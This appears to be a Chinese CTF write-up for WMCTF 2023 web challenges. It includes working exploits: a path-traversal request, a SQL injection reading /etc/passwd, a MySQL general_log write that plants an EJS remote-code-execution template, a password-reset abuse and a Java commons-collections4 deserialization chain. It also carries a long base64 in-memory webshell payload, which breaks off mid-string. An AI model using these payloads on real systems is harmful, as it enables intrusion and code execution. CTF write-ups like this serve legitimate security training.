WMCTF 2023
本文最后更新于 173 天前,其中的信息可能已经有所发展或是发生改变。

Web

AnyFileRead

  • 解析差异问题
GET /admin/../flag HTTP/1.1
Host: 43.132.224.5:8888
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

ezblog

  • /post/{id}/edit存在sql注入,具有--secure-file-priv权限
from requests import get
from urllib import parse
from re import search
proxies = {
    "http": None,
    "https": None
}

HOST = 'http://5bf11e7b-8550-4e62-a3f6-8b0f86c36a35.wmctf.wm-team.cn'

ROUTE = "/post/{}/edit".format(parse.quote('0 union select 666, 666, load_file(\'/etc/passwd\')').replace('/', '%2F'))

print(ROUTE)

r = get(HOST+ROUTE, proxies=proxies, allow_redirects=False)

print(r.status_code)

# print(r.content)

s = search(r'{.*}', r.text)

if s:
    print(s.group(0))
  • 使用pm2运行,存在/console路由(类似flask),使用pin码鉴权,同时,pm2会将stdout, stderr写入日志文件,默认位置:~/.pm2/logs/main-out.log,读取pin
/home/ezblog/.pm2/logs/main-out.log
  • /home/ezblog/views写符合条件的文件,由/api/debugger/template/test渲染,写/home/ezblog/views/index.ejs
# -*- encoding:utf-8 -*-

import requests

session = requests.session()

proxies = {
    "http": "http://127.0.0.1:8084",
    "https": "http://127.0.0.1:8084"
}
url = 'http://69e1df39-c6c8-4f77-8485-2a35297faefb.wmctf.wm-team.cn'
# url = 'http://localhost:3000'
authorization = "d0ae1a1c-e44e-448e-ba4c-f91cc903a317"


def execute_sql(sql):
    burp0_url = url + "/api/debugger/sql/execute"
    burp0_headers = {"Authorization": authorization}
    burp0_data = {"code": sql}
    r = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxies)
    print(r.json()["data"])


def main():
    execute_sql("show variables like \"%general_log%\";")
    execute_sql("create database mysql;")
    execute_sql("set global general_log_file = '/home/ezblog/views/index.ejs';")
    execute_sql("""CREATE TABLE mysql.general_log(
event_time TIMESTAMP(6) NOT NULL DEFAULT CURRENT_TIMESTAMP(6),
user_host mediumtext NOT NULL,
thread_id int(11) NOT NULL,
server_id int(10) unsigned NOT NULL,
command_type varchar(64) NOT NULL,
argument mediumtext NOT NULL
) ENGINE=CSV DEFAULT CHARSET=utf8 COMMENT='General log';""")
    execute_sql("SET GLOBAL log_output = 'FILE,TABLE';")
    execute_sql("set global general_log =1;")
    execute_sql("""select "<%=global.process.mainModule.constructor._load('child_process').execSync('/readflag').toString();%>";""")
    execute_sql("set global general_log =0;")


if __name__ == '__main__':
    main()

ez_java_again

  • 双url编码绕过
/Imagefile?url1=file:///fl%25%36%31g%23java

你的权限放着我来

  • 任意密码修改
POST /api/change HTTP/1.1
Host: 28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn
Content-Length: 72
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn
Referer: http://28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn/change
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

newPassword=123456&confirmPassword=123456&token=&email=alice@example.com
  • 修改jom@rookme.com密码
flag{test_flag}

ez_chanllenge

  • 存在commons-collections4-4.0,cc4链子
package com.example.exp;

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

public class ExpFin {

    public static void main(String[] args) throws Exception {

        ClassPool pool = ClassPool.getDefault();
        //内存马
        byte[] bytes = Repository.lookupClass(dawd.class).getBytes();
        Templates templatesImpl = new TemplatesImpl();
        setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
        setFieldValue(templatesImpl, "_name", "aaaa");
        setFieldValue(templatesImpl, "_tfactory", null);
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templatesImpl})
        };
        ChainedTransformer chain = new ChainedTransformer(transformers);
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templatesImpl});


        TransformingComparator transformingComparator = new TransformingComparator(instantiateTransformer);
        PriorityQueue priorityQueue = new PriorityQueue(2,transformingComparator);
        Field sizeField = PriorityQueue.class.getDeclaredField("size");
        sizeField.setAccessible(true);
        sizeField.set(priorityQueue,2);

        Field queueField = PriorityQueue.class.getDeclaredField("queue");
        queueField.setAccessible(true);
        queueField.set(priorityQueue,new Object[]{TrAXFilter.class,"bar"});

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
        objectOutputStream.writeObject(priorityQueue);
        objectOutputStream.close();
        String res = Base64.getEncoder().encodeToString(barr.toByteArray());
        System.out.println(res);
    }
    private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
        Field f = obj.getClass().getDeclaredField(field);
        f.setAccessible(true);
        f.set(obj, arg);
    }
}
  • 上马
import requests

burp0_url = "http://119.45.178.147:30000/"
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://119.45.178.147:30000", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://119.45.178.147:30000/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = {"data": "rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAQm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuVHJhbnNmb3JtaW5nQ29tcGFyYXRvci/5hPArsQjMAgACTAAJZGVjb3JhdGVkcQB+AAFMAAt0cmFuc2Zvcm1lcnQALUxvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnM0L1RyYW5zZm9ybWVyO3hwc3IAQG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuQ29tcGFyYWJsZUNvbXBhcmF0b3L79JkluG6xNwIAAHhwc3IAP29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H+khtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAKTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAMjHK/rq+AAAANAGoCAD9CAD+CAD/CgBrAQAKAGoBAQsBAgEDCwEEAQULAQQBBgoAagEHCgBqAQgHAQkKAAsBAAcBCggBCwoAagEMBwChCgANAQ0IAQ4KAEwBDwgBEAoAagERCAESCACXBwETCgAYARQLARUBAwoAGAEWCgA5ARcKADQBDQgBGAsBAgEZCAEaCgANARsKADQBHAgBHQgBHggBHwgAeQcBIAcBIQoAKAEiCgANASMKADQBJAoAagElCgAyASYKADQBJwoAagEoCgBqASkKAGoBKgcBKwgAsQcBLAcAsAkBLQEuCgA0AS8KATABMQcBMgoBLQEzCgEwATQHATUKAGoBNggBNwoAagE4CAE5BwC8CgE6ATsKAAsBPAoACwEZCAE9CgALAT4KAAsBPwoACwFACAFBCgA0AUIIAUMHAUQKADQBRQgBRggBRwgBSAcBSQoAUQEABwFKCgBTAUsHAUwKAFUBTQoAVQFOCgBRAU8KAFEBUAoAagFRCgFSATEKAVIBFgoANAFTBwFUCgA0AVUKAF4BVgoANAFXCgEwAQ0KAEwBWAoBMAFZBwFaCgBlAVYHAVsKAGcBXAoAKAFWBwFdBwFeAQANZ2V0VXJsUGF0dGVybgEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABZMY29tL2V4YW1wbGUvZXhwL2Rhd2Q7AQAMZ2V0Q2xhc3NOYW1lAQAPZ2V0QmFzZTY0U3RyaW5nAQAKRXhjZXB0aW9ucwcBXwEABjxpbml0PgEAAygpVgEAB2NvbnRleHQBABJMamF2YS9sYW5nL09iamVjdDsBAAhsaXN0ZW5lcgEACGNvbnRleHRzAQAQTGphdmEvdXRpbC9MaXN0OwEABHZhcjIBABRMamF2YS91dGlsL0l0ZXJhdG9yOwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBACRMamF2YS91dGlsL0xpc3Q8TGphdmEvbGFuZy9PYmplY3Q7PjsBAA1TdGFja01hcFRhYmxlBwFdBwFgBwFhAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcBYgEAEE1ldGhvZFBhcmFtZXRlcnMBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACmdldENvbnRleHQBABIoKUxqYXZhL3V0aWwvTGlzdDsBAARrZXkxAQADa2V5AQAIY2hpbGRyZW4BABNMamF2YS91dGlsL0hhc2hNYXA7AQAFdmFyMTIBAAtjaGlsZHJlbk1hcAEABHZhcjkBAAZ0aHJlYWQBABJMamF2YS9sYW5nL1RocmVhZDsBAAR2YXI2AQABSQEABHZhcjQBABNbTGphdmEvbGFuZy9UaHJlYWQ7AQAEdmFyNQEABXZhcjE0AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAHdGhyZWFkcwcBMgcBCgcBEwcBIAcBYwEACVNpZ25hdHVyZQEAJigpTGphdmEvdXRpbC9MaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQALZ2V0TGlzdGVuZXIBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACWNsYXp6Qnl0ZQEAAltCAQALZGVmaW5lQ2xhc3MBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABWNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBAAtjbGFzc0xvYWRlcgEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7BwErBwE1AQALYWRkTGlzdGVuZXIBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBAAdvYmplY3RzAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEACWxpc3RlbmVycwEACWFycmF5TGlzdAEAFUxqYXZhL3V0aWwvQXJyYXlMaXN0OwEABHZhcjcBAAppc0luamVjdGVkAQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylaAQABaQEADWV2aWxDbGFzc05hbWUBABJMamF2YS9sYW5nL1N0cmluZzsHAUQHAQkBAAxkZWNvZGVCYXNlNjQBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAMZGVjb2RlckNsYXNzAQAHZGVjb2RlcgEACWJhc2U2NFN0cgcBZAEADmd6aXBEZWNvbXByZXNzAQAGKFtCKVtCAQAOY29tcHJlc3NlZERhdGEBAANvdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQACaW4BAB5MamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbTsBAAZ1bmd6aXABAB9MamF2YS91dGlsL3ppcC9HWklQSW5wdXRTdHJlYW07AQAGYnVmZmVyAQABbgcBSQcBSgcBTAEABWdldEZWAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAANvYmoBAAlmaWVsZE5hbWUBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAARnZXRGAQA/KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBABRMamF2YS9sYW5nL0NsYXNzPCo+OwcBLAcBVAEADGludm9rZU1ldGhvZAEADHRhcmdldE9iamVjdAEACm1ldGhvZE5hbWUBAF0oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdtZXRob2RzAQAbW0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAFdmFyMTEBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBACJMamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb247AQAFdmFyMTABAApwYXJhbUNsYXp6AQASW0xqYXZhL2xhbmcvQ2xhc3M7AQAFcGFyYW0BAAZtZXRob2QBAAl0ZW1wQ2xhc3MHAWUHAO0HAVoHAVsBAApTb3VyY2VGaWxlAQAJZGF3ZC5qYXZhAQACLyoBAARhZHdhAQwsSDRzSUFBQUFBQUFBQUkxWGVYd1QxeEgrVnBLMXNyeUVJTUJnU01LVkJCK3loYm14d2NFQ0c3dXhUWUxBMURnTlhhOVcxb0lzQ1dsbE1HbWJIaWx0VTNxbWFadmVWK28yVFJzN3RMSUpEYUZuMnZRKzB2dSttOTd0UC8wblRiKzN1NVp0V1k3eHo5cmp2Wmx2WnI0M00rL3RVLzk3N0RLQVJ2eEhna2VObmxabFNCS1duMUNIMVZCQ1RRNkc5aVhVYkxZcnBVYjFqQXkzaEJ2RjFKbFFWczhNSjNRekZMSHZoL1JUT1QxcmRobFpVMDhLeVRJSml3WjFzME1YaWozcWtDNWhXWFZOMXpSdXhNd1l5Y0ZtV3QyWGluTFdmNFNROWEyRGV0TDB3Uy9obW9KMnI1cklVY0I3U05maUo1SStMSkt3MkVnYTVyNWMxa3dOM2FabTFDRUo3dXFhWGduWERqUnVpVFdxamJxMk14YmR2a1BmN3NNU1drZ3pCQW1CdWRZVkxNV3ljcml3blBpN0JXZ0x3YnVNcE42VEd4clFNNGZWZ1lRdU5GT2FtdWhWTTRaNGR3WTladHdncXJkTHNFYWtGYmpXRHcrdWs3Q3F1cXNrZjgzQ1JVbVRzR0tlZVFGeWd3Qlp4MUF5TnFYNytjdWtSdlNvaEp0dDNQbklieHNtZDVhTnBkbTVFeEkyWElVMi9Sdms4bGYzaDJ1S2ZSUnpBeEpjL1dFSkZWRTlScEtzY1laRDhjN091UW9LNmhBVTRkU1RRaWVjVG5Kc3FBbmpyQWhvNmJSRzJ4bE5UNXRHS2lsakV4MXdYTlV5STJrekZkcG5wT09rUjRJdm8yZlRxV1NXOUJkekVUZk5kS2lEbDBKWXRpUzE1S3llelJKYXd0cjVsU3dKQ3J0VEF5ZEVEbGl1NVV3akVlcFcwd0xFQ1VEQ3hnVXRXNExVV2JjZzRUSW9kdE5WNGNuWXd4UzR1cUJsM0NMaGh1ZVBWVVlyYTNSV21ETDJjU2hpcXRwSnZqbDV2b1NGT05zVDh1aVU4bnl4Y2VuYmNjQ1AzZWhRSU1Qblo0bTlRRUo1b2FZTHlUeXJIRXYwQndWZDZLNUFDM29VS0RiUWJTeU9ZamtaaDVnZFdpcHBxa2FTS2JsNlZnbkcxVXhFT0piVTlPYWFZd29PNDRnZkViQlNLZ2VuU1d2UHBJWUtFZDYrY0g3WmtSWVRNVzhlS25naCtvVC94OWpzTEU2ZHBGdy9oOHc1YWFuZ0RyeElzSEFuMTJONnlUclViTnhhdGhmN29lSTZIM1l4ZjlNNXVyOXpadndIQjA3b210azhkNlJtN3BDQ0tQUUs3RWZNaHkwK2JHUFI1M3hnUmZpSTYzVGlqU1dXcmdSNHI0SUVoaW9RQm9OMHQ3WkZmRWc3TlY5VTJUS1lFQlhrcERPWk5WV3Vrb1NhZWRPanVDc29NSkh6STR0aENXdG1DV1RUdXNiRTFESzZlYXMrRXVHYmpET01oSWJDSTZiT05QRlUxL1NIRlp6RlhTSWZYbUszc2hLR2UwVm5mcGtmSTdpYlNtS2ZFS0tkdG1SVzEzSVp3eHdKMFlnbCtncThVdmp6cWxsNWFyTWk0OVcyQTA3clhGcGRxbTIrQnEvMTR4eGV4ejVVTkNuajlmYldPR1Bia0ZBMUY2V3dvN3dCYi9UalBONGtNbStkWFlLSG5CSmNOYVZtcEVMaFhDeW1aL1NvUFVlOXQrSStrWEJ2WTQyVWxwSHhkcXNocTFHeFh5cDRwNmpPZCtBQkNjcUFtdFczYjkydmE5Yk9YbGxxS1FYdDc4WjdoRmZ2WlhPTnB0cU5wSnJnZGlxMkhqSDVmbnhBa1BoQkJSdFJMY1ErekJSSjZxZW5VMlQyZWFLUXZ3L2lveUxnVVdLeFJOVkVWdXhuSmRLVGZlRGplRWp3L0FrV1pHSC9vWGdaT1dydlhiQ0lTalN0Z2hPZndpUEM1ekduQzl1elBhbElUb3UzRzNvaU9tTzdlNVFaTmF4bXRrM3RUdlBMTnR1U20yWWZaUnliOWx5amZkdk1uSmdoa3RGakNjcUVMRGhIY2dzN1NZa3Rmc1U4V2pJZVp6cVRHSzVxUW1VU1dLTVM2aGRvNDdOTkszZ0NWOFRxZk00K0hrWnlhVDJqQ2RNS3ZpQ1MvankrV0xSY3Mwcnd5MzVjd0pQVXplcG1xNmFKN21pZnhhcVBDWUd2NGlrL0x1TnJiRGNFTDlwam5xL25mUVBmRklyZjR0clRtN05uUlVaYTJadVpPb3NVblZMRVFZSG5NaVozTnBkc0dES3lXa080TmRJMmxmUVpINTRtUml6bEhIMXZXb0NscWNML0lYNGtPUGd4YThpMmI1ZWNEeisxSzdkYk4rTXBzcjYzQkY3L0hMeFM2MkFqME5UUDhRdGg2cGNTVnM0bkplUFhMQ0lqT1p3NnlSaDJsU0N6L3lyNS9TMSs1OGR2OEhzWnRVNVRiQkFiV0VQWWFoUSsvTW5lRWd2a1BVTzdOZ0UrL0pWZFpyZVdzQTduQ2hhTFU3WUwvNkJDSkpYTGFIcTdJUkpnZVZpUEcwbnFUbjJCTkFnaldFZFJEd2pHbjErYzlmbXBvL0NKUnhLT2xQTnRNZS9pengyb0dMTWUvT0tZTVdmeW1xbEoybmNtQTg2a054QzRnTXB4NjFrU1h3SE8vQmJlaFVSWjdRU3VGOU11ckxRZ1hMeXVwMXNiVUdXNVl3bGhGVlk3QURjNEFDMlVGTExlMnJvSnJDOUd1Sms2R3kyRVNsdktRUkJQYTdEV01yNEJOenBZMnl4dDRrL0RlQzNEZFRNZ3BBSUVNNVlHQkFTYnJ3T3hoeTRMcWZMYU9uZmQ1UWswakJWQk5jeUFLaTlBbGFNR3RSWlVhTW9iNlQ1cXlKd2JyOHVqOHdwYXVvT1R1UFVpRHJvd2lkdnpPUG9BN3E4TlRxQy9KM2dSeHlVMGVTNUI3WnZBUUZOWlZWbEE0K0NnRzBmNUdLOHZQQnBWSHVmWkV6ajVLQ292SXVWRzROUWtUamQ1cTd4bGx6RFN4OUU4WGhvNE5ZR1g1M0hQSmJqNmF2TzRONDgzVCtBdFZkNWF3dDR2SVk5MzVmRytQRDZVeDBmeStGaFZXUjRQSHgxRldaTjNGSjZlY1FZWHdTZ2U0Z2V6RHcvakVkN2RGZ1h0V0dLdE9ZOU1ESDA3RjJBSG1kdkorVjA4QlRmaEFKcXB1UWZIdWF3eDNJSzdzSmM0WVNLMUVxZWRTUHN4aGc2THdnNlNFK1A0R213bVVXdFpwVnV3bFhhcWNRL1J0M01kR3FtL2craGxnc1FDMWVQT3F2bTRzZTJpVFJmYXJFVHhQRWN6WGhrdUdidGx0TWpZS3lNczA2QWtvL0cva1BqY0tKYVM1MU5lUDBrZFVUT04xcXAzY0VSWUNVcmRkUUZ0RXVPQk9DOVhzTGQ3RkZVOWRUUGVmRTJlVWJqNUh4eXpFbmNKcTYwUnl4bkZlZ0hQSk9DbXlIR0IralNqRWFnN3BXNnhCajMxZ1hNUG9yS2U2ZkI1SWkxcTh0VG44YVdlMGVlZUNUNEo1Ukl1OUxFQ3Z2SkUwSlBIMTROVStQWVkvVnZFZXE3a2RtRHp2NW1GQkJ3VW53ZGs3eEJuRDNQK0NDVjZPWDhVMXpPNnRlaG5DdDZCZXR4SitlTVcxMXZweDByK1BvM1BNR3A2eEF5WXNOamN5V1JjUmpzdU1uNFJqL0V1YUxxRXo5S2k0SFVKUE05Q2xuRlp4dmtlR1JmS2xSblVTZUp3NHdUN0xCZFJCRHNTK01Fa2Z0SWREUHpNOHpqTzk3a0RrVWdldndveXkvaCtyczlkeDljL1hNRWZDLzlqM1lFL1U0UHMvTVZORFFwTHZKK2pWSk9uaWx6Y0cvamJUS1FxejN3NFZubHVvbHRUMmJxS0xnRTZyekdPRFpLTk9PTTErSzExd21LbGhUTmU5b2J2TUZvWFoxcXRKemZuNi9GZDh1T2h4Z0Z5OWoycjJFY0tHVGlDNzF1Y3RkbE40WlJnYkpvVUgvNWU2STVyWWY5NUp2SFBjYXZqVExlMlZiUzBtaVAvc2hyTXYvOFBtWmIyNXFNU0FBQT0MAHcAeAwAkwCUBwFgDACPAWYHAWEMAWcBaAwBaQFqDACtAK4MALkAugEAE2phdmEvdXRpbC9BcnJheUxpc3QBABBqYXZhL2xhbmcvVGhyZWFkAQAKZ2V0VGhyZWFkcwwA6ADdDAFrAG0BABxDb250YWluZXJCYWNrZ3JvdW5kUHJvY2Vzc29yDAFsAW0BAAZ0YXJnZXQMANwA3QEABnRoaXMkMAEAEWphdmEvdXRpbC9IYXNoTWFwDAFuAW8HAXAMAXEArgwBcgFzAQAPU3RhbmRhcmRDb250ZXh0DAF0AXUBABVUb21jYXRFbWJlZGRlZENvbnRleHQMAXYBdwwBeABtAQAZUGFyYWxsZWxXZWJhcHBDbGFzc0xvYWRlcgEAH1RvbWNhdEVtYmVkZGVkV2ViYXBwQ2xhc3NMb2FkZXIBAAlyZXNvdXJjZXMBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MAHcBeQwBegF7DAF8AXcMAHMAbQwBfQF+DAF/AWoMAHQAbQwAyADJDADOAM8BABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBAA9qYXZhL2xhbmcvQ2xhc3MHAYAMAYEAtAwBggGDBwFlDAGEAYUBABBqYXZhL2xhbmcvT2JqZWN0DAGGAYcMAYgBiQEAE2phdmEvbGFuZy9UaHJvd2FibGUMAMEAwgEAG2FkZEFwcGxpY2F0aW9uRXZlbnRMaXN0ZW5lcgwA6ADrAQAcZ2V0QXBwbGljYXRpb25FdmVudExpc3RlbmVycwcBigwBiwGMDAB3AY0BABxzZXRBcHBsaWNhdGlvbkV2ZW50TGlzdGVuZXJzDAGOAY8MAZABkQwBcQGSAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgwBkwF+AQAMZGVjb2RlQnVmZmVyAQAQamF2YS9sYW5nL1N0cmluZwwBlAGDAQAQamF2YS51dGlsLkJhc2U2NAEACmdldERlY29kZXIBAAZkZWNvZGUBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQEAHGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW0MAHcBlQEAHWphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtDAB3AZYMAZcBmAwBmQGaDAGbAZwMAOIA4wcBnQwBngGfAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAGgAXMMAHcBoQwBogGjDAGkAXUMAaUBpgEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgwBpwBtAQAUY29tL2V4YW1wbGUvZXhwL2Rhd2QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEADmphdmEvdXRpbC9MaXN0AQASamF2YS91dGlsL0l0ZXJhdG9yAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAAZrZXlTZXQBABEoKUxqYXZhL3V0aWwvU2V0OwEADWphdmEvdXRpbC9TZXQBAANnZXQBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAANhZGQBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAIdG9TdHJpbmcBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBAA5nZXRDbGFzc0xvYWRlcgEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAtuZXdJbnN0YW5jZQEAEWphdmEvbGFuZy9JbnRlZ2VyAQAEVFlQRQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABBqYXZhL3V0aWwvQXJyYXlzAQAGYXNMaXN0AQAlKFtMamF2YS9sYW5nL09iamVjdDspTGp